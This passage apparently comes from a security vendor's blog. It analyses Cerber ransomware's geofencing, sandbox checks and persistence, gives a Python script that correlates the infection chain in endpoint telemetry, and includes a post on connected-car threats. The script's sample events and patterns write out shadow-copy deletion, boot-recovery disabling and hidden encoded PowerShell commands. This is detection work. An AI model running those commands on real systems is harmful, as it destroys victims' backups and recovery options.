              Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

               The attack also checked the system’s keyboard layout to further avoid infecting machines in the attackers’ own region, skipping the following layouts (Windows language identifiers): 1049 Russian, 1058 Ukrainian, 1059 Belarusian, 1064 Tajik, 1067 Armenian, 1068 Azeri (Latin), 1079 Georgian, 1087 Kazakh, 1088 Kyrgyz (Cyrillic), 1090 Turkmen, 1091 Uzbek (Latin), 2072 Romanian (Moldova), 2073 Russian (Moldova), 2092 Azeri (Cyrillic), 2115 Uzbek (Cyrillic).

              Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

              Anti VM Checks

              The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

              Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

              Persistence

              Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

              • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
               • The “Command Processor” AutoRun value is changed to point to the Cerber payload so that the malware is launched each time the Windows command interpreter, cmd.exe, starts.
              • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
               • Common persistence methods such as the Run and RunOnce registry keys are also used.
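
The attack-cycle steps, shadow-deletion commands and persistence entries listed in this post can be correlated per host rather than alerted on one at a time. The following added example, which is not FireEye's code, does that over constructed telemetry in a simplified process/registry/file event shape; the hostnames, paths, the GUID-style folder name and the encoded PowerShell payload are hypothetical placeholders.

```python
"""Correlate the Cerber execution chain on one endpoint.

Added example, not FireEye's code. Each stage mirrors a step of the attack
cycle described in this post: Office spawning hidden/encoded PowerShell,
PowerShell launching the dropped executable from %APPDATA%, shadow-copy
deletion, boot-recovery tampering, and the registry and startup-folder
persistence. Events are constructed in a simplified process/registry/file
telemetry shape; hostnames, the user folder, the GUID-style directory and
the Base64 payload are hypothetical placeholders.
"""
import re
from collections import defaultdict


def _proc(e, image):
    return e["type"] == "process" and e["image"].lower() == image


STAGES = {
    "office_spawns_hidden_powershell": lambda e: (
        _proc(e, "powershell.exe")
        and e["parent"].lower() in {"winword.exe", "excel.exe", "powerpnt.exe"}
        and re.search(r"-(?:w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?\b"
                      r"|e(?:xecutionpolicy|p)\s+bypass)", e["cmdline"], re.I)
    ),
    "powershell_runs_dropped_exe": lambda e: (
        e["type"] == "process"
        and e["parent"].lower() == "powershell.exe"
        and "\\appdata\\" in e["cmdline"].lower()
    ),
    "shadow_copy_deletion": lambda e: (
        (_proc(e, "vssadmin.exe") and re.search(r"delete\s+shadows", e["cmdline"], re.I))
        or (_proc(e, "wmic.exe") and re.search(r"shadowcopy\s+delete", e["cmdline"], re.I))
    ),
    "boot_recovery_disabled": lambda e: (
        _proc(e, "bcdedit.exe")
        and re.search(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures",
                      e["cmdline"], re.I)
    ),
    "registry_persistence": lambda e: (
        e["type"] == "registry"
        and re.search(r"\\Command Processor\\AutoRun$"
                      r"|\\Control Panel\\Desktop\\SCRNSAVE\.EXE$"
                      r"|\\CurrentVersion\\Run(?:Once)?\\", e["key"], re.I)
        and "\\appdata\\" in e["value"].lower()
    ),
    "startup_folder_lnk": lambda e: (
        e["type"] == "file"
        and re.search(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", e["path"], re.I)
    ),
}


def correlate(events, min_stages=2):
    """Map host -> {stage: first matching event} for hosts showing at least
    min_stages distinct stages. A lone 'vssadmin delete shadows' run by an
    administrator scores one stage and stays quiet; the chain does not."""
    seen = defaultdict(dict)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        for stage, matches in STAGES.items():
            if stage not in seen[e["host"]] and bool(matches(e)):
                seen[e["host"]][stage] = e
    return {host: stages for host, stages in seen.items() if len(stages) >= min_stages}


SAMPLE_EVENTS = [  # constructed; 'ts' is an event sequence number
    {"ts": 1, "host": "WS-ACCT03", "type": "process", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ep bypass -w hidden -enc QQBCAEMA"},
    {"ts": 2, "host": "WS-ACCT03", "type": "process", "parent": "powershell.exe", "image": "profilest.exe",
     "cmdline": "C:\\Users\\u\\AppData\\Roaming\\profilest.exe"},
    {"ts": 3, "host": "WS-ACCT03", "type": "process", "parent": "profilest.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": 4, "host": "WS-ACCT03", "type": "process", "parent": "profilest.exe", "image": "wmic.exe",
     "cmdline": "WMIC.exe shadowcopy delete"},
    {"ts": 5, "host": "WS-ACCT03", "type": "process", "parent": "profilest.exe", "image": "bcdedit.exe",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled no"},
    {"ts": 6, "host": "WS-ACCT03", "type": "registry",
     "key": "HKCU\\Software\\Microsoft\\Command Processor\\AutoRun",
     "value": "C:\\Users\\u\\AppData\\Roaming\\{0f6d1c2e-5a3b-4f77-9e21-8c0a4b6d2f10}\\dwm.exe"},
    {"ts": 7, "host": "WS-ACCT03", "type": "file",
     "path": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\dwm.lnk"},
    # Benign noise on another host: an admin pruning old shadow copies by hand.
    {"ts": 8, "host": "SRV-FILE01", "type": "process", "parent": "cmd.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin delete shadows /for=D: /oldest"},
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
```

On the constructed input the infected workstation scores all six stages while the file server scores only the shadow-copy stage and is not reported. The Office parent list, the two-stage threshold and the %APPDATA% path check are starting points to tune against the environment's own baseline.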

               A Solid Defense

              Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

              Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

              Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

              FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

              Conclusion

              Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

              Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

              HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

               Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired, or is transpiring. This can only be done if those professionals have the right tools and visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real time. At FireEye, we also go one step further and contact the relevant authorities to bring down these types of campaigns.

              Click here for more information about Exploit Guard technology.

              Connected Cars: The Open Road for Hackers

              As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

              Car Hacking?

              Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

              Ransomware

               The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make vehicles attractive ransomware targets. In contrast to ransomware that infects ordinary computer systems, vehicles are most exposed to ransomware when their disablement causes knock-on effects.

              For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

              Malicious C2 and Final Hop Points

              One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

              Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

              Understanding the Risk Landscape

              The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

              These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

              FireEye Capabilities

               FireEye combines our industry-leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve its prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can give firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because attackers are constantly evolving.

              For more information, contact FireEye.

              FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.